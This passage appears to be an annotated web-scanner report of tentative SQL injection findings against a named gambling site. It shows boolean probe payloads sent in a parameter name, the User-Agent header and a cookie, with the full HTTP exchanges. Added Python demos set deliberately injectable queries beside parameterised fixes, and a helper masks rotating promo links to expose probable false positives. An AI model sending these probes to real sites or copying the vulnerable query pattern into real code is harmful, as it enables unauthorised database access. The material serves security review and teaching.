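    conn.execute("CREATE TABLE games (id INTEGER, slug TEXT, title TEXT, category TEXT)")
    conn.executemany("INSERT INTO games VALUES (?, ?, ?, ?)", [
        (1, "Disco-Keno", "Disco Keno", "Casino"),
        (2, "The-Lost-Maya", "The Lost Maya", "Fantasy"),
        (3, "Goal-Kick", "Goal Kick", "Sports"),
    ])
    return conn

# The payload pairs from findings 1.1 and 1.2, URL-decoded:
#   %20and%201%3d1--%20   ->  " and 1=1-- "   (numeric context, no quote needed)
#   '%20and%201%3d1--%20  ->  "' and 1=1-- "  (string context, closes the quote)
NUMERIC_PAIR = (" and 1=1-- ", " and 1=2-- ")
STRING_PAIR = ("' and 1=1-- ", "' and 1=2-- ")


def titles_by_slug_vulnerable(conn, slug):
    # Tainted value spliced into the query text. A quote in the input closes the
    # literal and everything after it is parsed as SQL; "--" comments out the
    # application's own closing quote.
    sql = "SELECT title FROM games WHERE slug = '" + slug + "'"
    return [row[0] for row in conn.execute(sql)]


def count_by_id_vulnerable(conn, game_id):
    # Numeric context: the input simply continues the expression, which is why
    # the finding 1.1 payload carries no leading apostrophe.
    sql = "SELECT COUNT(*) FROM games WHERE id = " + game_id
    return conn.execute(sql).fetchone()[0]


def titles_by_slug_parameterised(conn, slug):
    # Structure first, data second: the driver binds the value after the
    # statement has been parsed, so it can only ever be compared as a string.
    rows = conn.execute("SELECT title FROM games WHERE slug = ?", (slug,))
    return [row[0] for row in rows]


def count_by_id_parameterised(conn, game_id):
    # Parameterise numeric values as well. Converting to int first is an extra
    # input check that rejects the payload outright; the placeholder is the
    # actual defence.
    rows = conn.execute("SELECT COUNT(*) FROM games WHERE id = ?", (int(game_id),))
    return rows.fetchone()[0]


def boolean_probe(query_fn, conn, base, pair):
    """Reproduce the scanner's difference-based check: run base+TRUE and
    base+FALSE and report whether the results differ. True means the endpoint
    would be flagged."""
    results = []
    for payload in pair:
        try:
            results.append(query_fn(conn, base + payload))
        except ValueError:
            results.append("rejected")   # input validation refused the value
    return results[0] != results[1]


if __name__ == "__main__":
    db = make_db()
    print("vulnerable string lookup flagged: ",
          boolean_probe(titles_by_slug_vulnerable, db, "Disco-Keno", STRING_PAIR))
    print("vulnerable numeric lookup flagged:",
          boolean_probe(count_by_id_vulnerable, db, "1", NUMERIC_PAIR))
    print("parameterised string lookup flagged:",
          boolean_probe(titles_by_slug_parameterised, db, "Disco-Keno", STRING_PAIR))
    print("parameterised numeric lookup flagged:",
          boolean_probe(count_by_id_parameterised, db, "1", NUMERIC_PAIR))
```

The probe flags both concatenating functions, because the TRUE payload leaves the original predicate intact while the FALSE payload empties the result, and flags neither parameterised function: the string version compares the whole payload as a literal slug and finds nothing for either request, and the numeric version rejects both before any query runs.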

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. https://scratch.betsson.com/en/Casino/Disco-Keno [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://scratch.betsson.com
Path:   /en/Casino/Disco-Keno

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. In this instance the only visible difference between the two responses below is the rotating left-menu promotion link (Golden Fortune in Response 1, Goal Kick in Response 2) together with a 10-byte change in Content-Length (102704 versus 102694); both responses return 200 and the same page section (Startpage_Casino). A per-request cross-sell block produces exactly that kind of difference whether or not the query was affected, so treat this finding as unconfirmed until the comparison has been repeated against several unmodified baseline requests and the difference survives once the promotion block is masked.

Request 1

GET /en/Casino/Disco-Keno?1%20and%201%3d1--%20=1 HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:10 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:10 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:10 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:10 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:10 GMT
Connection: close
Content-Length: 102704


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<a href="https://scratch.betsson909.com/en/Classic/Golden-Fortune">Try Golden Fortune now... the maximum Jackpot is 200,000 GBP!</a> </span>
</div>
<div class="divLeftMenuPromoItemBottom"></div>
</div>
<div class="divMiddleContent" id="divMiddleContent" >
<div id="active_main_promo">
<div class="divMainPromo" id="divMainPromo"></div>
</div>
<div id="divMain" class="divMain">

<meta name="WT.ti" content="Scratch/Startpage_Casino" />
<meta name="WT.cg_s" content="Startpage_Casino" />

<!-- Meta data for AB-testing, remove when tests id done -->




<div class="gamesView">
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_all" class="inactiveViewBtnOuter" onclick="ToggleGameView('all','Casino');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_allText" class="inactiveViewBtnInner">View All</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopular" class="inactiveViewBtnOuter" onclick="ToggleGameView('mostpopular','Casino');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopularText" class="inactiveViewBtnInner">Most Popular</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_classic" class="inactiveViewBtnOuter" onclick="ToggleGameView('classic','Casino');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_classicText" class="inactiveViewBtnInner">Classic Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_sports" class="inactiveViewBtnOuter" onclick="ToggleGameView('sports','Casino');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_sportsText" class="inactiveViewBtnInner">Sports Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasy" class="inactiveViewBtnOuter" onclick="ToggleGameView('fantasy','Casino');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasyText" class="inactiveViewBtnInner">Fantasy Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_casino" class="activeViewBtnOuter" oncli
...[SNIP]...

Request 2

GET /en/Casino/Disco-Keno?1%20and%201%3d2--%20=1 HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:10 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:10 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:10 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:10 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:10 GMT
Connection: close
Content-Length: 102694


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<a href="https://scratch.betsson909.com/en/Sports/Goal-Kick">Calling all football fans...Goal Kick - ..200,000 Jackpot!</a></span>
</div>
<div class="divLeftMenuPromoItemBottom"></div>
</div>
<div class="divMiddleContent" id="divMiddleContent" >
<div id="active_main_promo">
<div class="divMainPromo" id="divMainPromo"></div>
</div>
<div id="divMain" class="divMain">

<meta name="WT.ti" content="Scratch/Startpage_Casino" />
<meta name="WT.cg_s" content="Startpage_Casino" />

<!-- Meta data for AB-testing, remove when tests id done -->




<div class="gamesView">
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_all" class="inactiveViewBtnOuter" onclick="ToggleGameView('all','Casino');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_allText" class="inactiveViewBtnInner">View All</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopular" class="inactiveViewBtnOuter" onclick="ToggleGameView('mostpopular','Casino');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopularText" class="inactiveViewBtnInner">Most Popular</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_classic" class="inactiveViewBtnOuter" onclick="ToggleGameView('classic','Casino');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_classicText" class="inactiveViewBtnInner">Classic Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_sports" class="inactiveViewBtnOuter" onclick="ToggleGameView('sports','Casino');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_sportsText" class="inactiveViewBtnInner">Sports Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasy" class="inactiveViewBtnOuter" onclick="ToggleGameView('fantasy','Casino');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasyText" class="inactiveViewBtnInner">Fantasy Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_casino" class="activeViewBtnOuter" onclick="Toggle
...[SNIP]...
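An added helper for the manual review the note above asks for; it is not part of the scanner's output or of the site under test. It masks regions that change between otherwise identical requests before comparing the TRUE and FALSE responses, so that only a content difference counts. The embedded responses are constructed excerpts modelled on Response 1 and Response 2 of this finding; the promotion-link selector is taken from those two responses, while the ASP.NET hidden-field mask is an assumption based on the X-AspNet-Version header and is not something visible in the report.

```python
import re

# Constructed excerpt modelled on Response 1 of finding 1.1. The left-menu
# promotion link is the only thing that differs from Response 2.
RESP_TRUE = """
<div class="divLeftMenuPromoItem"><span>
<a href="https://scratch.betsson909.com/en/Classic/Golden-Fortune">Try Golden Fortune now... the maximum Jackpot is 200,000 GBP!</a> </span>
</div>
<div class="divLeftMenuPromoItemBottom"></div>
<div class="divMiddleContent" id="divMiddleContent" >
<meta name="WT.ti" content="Scratch/Startpage_Casino" />
<div class="gamesView">
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_all" class="inactiveViewBtnOuter">View All</div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_casino" class="activeViewBtnOuter">Casino Scratch</div>
</div>
"""

# Constructed excerpt modelled on Response 2: same page, different promo item.
RESP_FALSE = RESP_TRUE.replace(
    '<a href="https://scratch.betsson909.com/en/Classic/Golden-Fortune">Try Golden Fortune now... the maximum Jackpot is 200,000 GBP!</a>',
    '<a href="https://scratch.betsson909.com/en/Sports/Goal-Kick">Calling all football fans...Goal Kick - 200,000 Jackpot!</a>',
)

# Constructed contrast case: part of the game view itself is missing, the sort
# of change a "1=2" condition would cause if the query had really been altered.
RESP_REAL_DIFF = RESP_FALSE.replace(
    '<div id="ctl00_ctl00_cphMain_cphMain_ctl01_casino" class="activeViewBtnOuter">Casino Scratch</div>\n',
    '',
)

# Regions known (or assumed) to change between otherwise identical requests.
# The first selector comes from the two responses in this finding; the second
# is an assumption about ASP.NET hidden fields that rotate per response.
VOLATILE = [
    (re.compile(r'<a href="https://scratch\.betsson909\.com/[^"]*">[^<]*</a>'),
     '<a href="#promo">PROMO</a>'),
    (re.compile(r'(name="__(?:VIEWSTATE|EVENTVALIDATION)"[^>]*value=")[^"]*"'),
     r'\1MASKED"'),
]


def normalise(body):
    """Mask volatile regions and collapse whitespace so that only content
    differences survive the comparison."""
    for pattern, replacement in VOLATILE:
        body = pattern.sub(replacement, body)
    return re.sub(r"\s+", " ", body).strip()


def classify(resp_true, resp_false):
    """Return "identical", "noise only" or "stable difference" for one
    TRUE/FALSE response pair."""
    if resp_true == resp_false:
        return "identical"
    if normalise(resp_true) == normalise(resp_false):
        return "noise only"
    return "stable difference"


def baseline_is_quiet(baselines):
    """Several responses to the unmodified request should normalise to one
    value. If they do not, the mask list is incomplete and no TRUE/FALSE
    comparison against this endpoint can be trusted yet."""
    return len({normalise(b) for b in baselines}) == 1


if __name__ == "__main__":
    print("baseline quiet:", baseline_is_quiet([RESP_TRUE, RESP_FALSE]))
    print("finding 1.1 pair:", classify(RESP_TRUE, RESP_FALSE))
    print("contrast pair:  ", classify(RESP_TRUE, RESP_REAL_DIFF))
```

Run the baseline check first with three or four responses to the unmodified request; only when they normalise to a single value does a "stable difference" between the TRUE and FALSE responses mean anything. For the pair in this finding the classification is "noise only", which is what the Content-Length and promo-link observations above predict.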

1.2. https://scratch.betsson.com/en/Fantasy/The-Lost-Maya [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://scratch.betsson.com
Path:   /en/Fantasy/The-Lost-Maya

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the User-Agent HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. As in finding 1.1, the response below carries a rotating left-menu promotion link (3 Wow here), so a byte-level difference between the two responses is not on its own evidence that the User-Agent value reached a query; note also that this payload pair starts with a single quote, so a genuine flaw would mean the header is being written into a quoted SQL string literal, which should be confirmed with a stable baseline before the finding is reported as High.

Request 1

GET /en/Fantasy/The-Lost-Maya HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'%20and%201%3d1--%20
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:44 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:44 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:44 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:44 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:54:44 GMT
Connection: close
Content-Length: 102708


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<a href="https://scratch.betsson909.com/en/Classic/3-Wow">Win the dream salary with 3 wow - ...5,500 per month for 15 years!</a></span>
</div>
<div class="divLeftMenuPromoItemBottom"></div>
</div>
<div class="divMiddleContent" id="divMiddleContent" >
<div id="active_main_promo">
<div class="divMainPromo" id="divMainPromo"></div>
</div>
<div id="divMain" class="divMain">

<meta name="WT.ti" content="Scratch/Startpage_Fantasy" />
<meta name="WT.cg_s" content="Startpage_Fantasy" />

<!-- Meta data for AB-testing, remove when tests id done -->




<div class="gamesView">
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_all" class="inactiveViewBtnOuter" onclick="ToggleGameView('all','Fantasy');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_allText" class="inactiveViewBtnInner">View All</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopular" class="inactiveViewBtnOuter" onclick="ToggleGameView('mostpopular','Fantasy');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopularText" class="inactiveViewBtnInner">Most Popular</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_classic" class="inactiveViewBtnOuter" onclick="ToggleGameView('classic','Fantasy');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_classicText" class="inactiveViewBtnInner">Classic Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_sports" class="inactiveViewBtnOuter" onclick="ToggleGameView('sports','Fantasy');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_sportsText" class="inactiveViewBtnInner">Sports Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasy" class="activeViewBtnOuter" onclick="ToggleGameView('fantasy','Fantasy');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasyText" class="inactiveViewBtnInner">Fantasy Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_casino" class="inactiveViewBtnOuter" oncl
...[SNIP]...

Request 2

GET /en/Fantasy/The-Lost-Maya HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'%20and%201%3d2--%20
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:45 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:45 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:45 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:45 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:54:44 GMT
Connection: close
Content-Length: 102695


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<a href="https://scratch.betsson909.com/en/Casino/Slot-Super-7">Try our classic Slot Scratch card, Super 7 now!</a></span>
</div>
<div class="divLeftMenuPromoItemBottom"></div>
</div>
<div class="divMiddleContent" id="divMiddleContent" >
<div id="active_main_promo">
<div class="divMainPromo" id="divMainPromo"></div>
</div>
<div id="divMain" class="divMain">

<meta name="WT.ti" content="Scratch/Startpage_Fantasy" />
<meta name="WT.cg_s" content="Startpage_Fantasy" />

<!-- Meta data for AB-testing, remove when tests id done -->




<div class="gamesView">
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_all" class="inactiveViewBtnOuter" onclick="ToggleGameView('all','Fantasy');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_allText" class="inactiveViewBtnInner">View All</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopular" class="inactiveViewBtnOuter" onclick="ToggleGameView('mostpopular','Fantasy');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopularText" class="inactiveViewBtnInner">Most Popular</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_classic" class="inactiveViewBtnOuter" onclick="ToggleGameView('classic','Fantasy');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_classicText" class="inactiveViewBtnInner">Classic Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_sports" class="inactiveViewBtnOuter" onclick="ToggleGameView('sports','Fantasy');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_sportsText" class="inactiveViewBtnInner">Sports Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasy" class="activeViewBtnOuter" onclick="ToggleGameView('fantasy','Fantasy');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasyText" class="inactiveViewBtnInner">Fantasy Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_casino" class="inactiveViewBtnOuter" onclick="ToggleGa
...[SNIP]...

1.3. https://scratch.betsson.com/en/Slots/Fantasia [site cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://scratch.betsson.com
Path:   /en/Slots/Fantasia

Issue detail

The site cookie appears to be vulnerable to SQL injection attacks. The payloads 52785076'%20or%201%3d1--%20 and 52785076'%20or%201%3d2--%20 were each submitted in the site cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. Here the visible difference between the two responses is again the rotating left-menu promotion (Golden-Fortune versus 7th-Heaven) and an 18-byte change in Content-Length (102695 versus 102677); the server also re-issues site=en in both responses, so the tampered cookie value does not appear to have been accepted.

Request 1

GET /en/Slots/Fantasia HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en52785076'%20or%201%3d1--%20; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:03 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:03 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:03 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:03 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:03 GMT
Connection: close
Content-Length: 102695


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<a href="https://scratch.betsson909.com/en/Classic/Golden-Fortune">Try Golden Fortune now... the maximum Jackpot is 200,000 GBP!</a> </span>
</div>
<div class="divLeftMenuPromoItemBottom"></div>
</div>
<div class="divMiddleContent" id="divMiddleContent" >
<div id="active_main_promo">
<div class="divMainPromo" id="divMainPromo"></div>
</div>
<div id="divMain" class="divMain">

<meta name="WT.ti" content="Scratch/Startpage_Slots" />
<meta name="WT.cg_s" content="Startpage_Slots" />

<!-- Meta data for AB-testing, remove when tests id done -->




<div class="gamesView">
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_all" class="inactiveViewBtnOuter" onclick="ToggleGameView('all','Slots');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_allText" class="inactiveViewBtnInner">View All</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopular" class="inactiveViewBtnOuter" onclick="ToggleGameView('mostpopular','Slots');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopularText" class="inactiveViewBtnInner">Most Popular</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_classic" class="inactiveViewBtnOuter" onclick="ToggleGameView('classic','Slots');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_classicText" class="inactiveViewBtnInner">Classic Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_sports" class="inactiveViewBtnOuter" onclick="ToggleGameView('sports','Slots');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_sportsText" class="inactiveViewBtnInner">Sports Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasy" class="inactiveViewBtnOuter" onclick="ToggleGameView('fantasy','Slots');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasyText" class="inactiveViewBtnInner">Fantasy Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_casino" class="inactiveViewBtnOuter" onclick="ToggleGam
...[SNIP]...

Request 2

GET /en/Slots/Fantasia HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en52785076'%20or%201%3d2--%20; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:05 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:05 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:05 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:05 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:05 GMT
Connection: close
Content-Length: 102677


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<a href="https://scratch.betsson909.com/en/Classic/7th-Heaven">Let seven be your lucky number, play 7th Heaven!</a></span>
</div>
<div class="divLeftMenuPromoItemBottom"></div>
</div>
<div class="divMiddleContent" id="divMiddleContent" >
<div id="active_main_promo">
<div class="divMainPromo" id="divMainPromo"></div>
</div>
<div id="divMain" class="divMain">

<meta name="WT.ti" content="Scratch/Startpage_Slots" />
<meta name="WT.cg_s" content="Startpage_Slots" />

<!-- Meta data for AB-testing, remove when tests id done -->




<div class="gamesView">
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_all" class="inactiveViewBtnOuter" onclick="ToggleGameView('all','Slots');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_allText" class="inactiveViewBtnInner">View All</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopular" class="inactiveViewBtnOuter" onclick="ToggleGameView('mostpopular','Slots');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopularText" class="inactiveViewBtnInner">Most Popular</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_classic" class="inactiveViewBtnOuter" onclick="ToggleGameView('classic','Slots');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_classicText" class="inactiveViewBtnInner">Classic Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_sports" class="inactiveViewBtnOuter" onclick="ToggleGameView('sports','Slots');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_sportsText" class="inactiveViewBtnInner">Sports Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasy" class="inactiveViewBtnOuter" onclick="ToggleGameView('fantasy','Slots');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasyText" class="inactiveViewBtnInner">Fantasy Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_casino" class="inactiveViewBtnOuter" onclick="ToggleGameView('casino','Sl
...[SNIP]...

1.4. https://scratch.betsson.com/en/Sports/Bowling [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://scratch.betsson.com
Path:   /en/Sports/Bowling

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads 17123380'%20or%201%3d1--%20 and 17123380'%20or%201%3d2--%20 were each submitted in the User-Agent HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. The two responses below differ only in the rotating promotional link (7th-Heaven versus 3-Wow) and 13 bytes of Content-Length (102693 versus 102706), the same pattern seen on the other Tentative findings against this host.

Request 1

GET /en/Sports/Bowling HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)17123380'%20or%201%3d1--%20
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:52:11 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:52:11 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:52:11 GMT; path=/
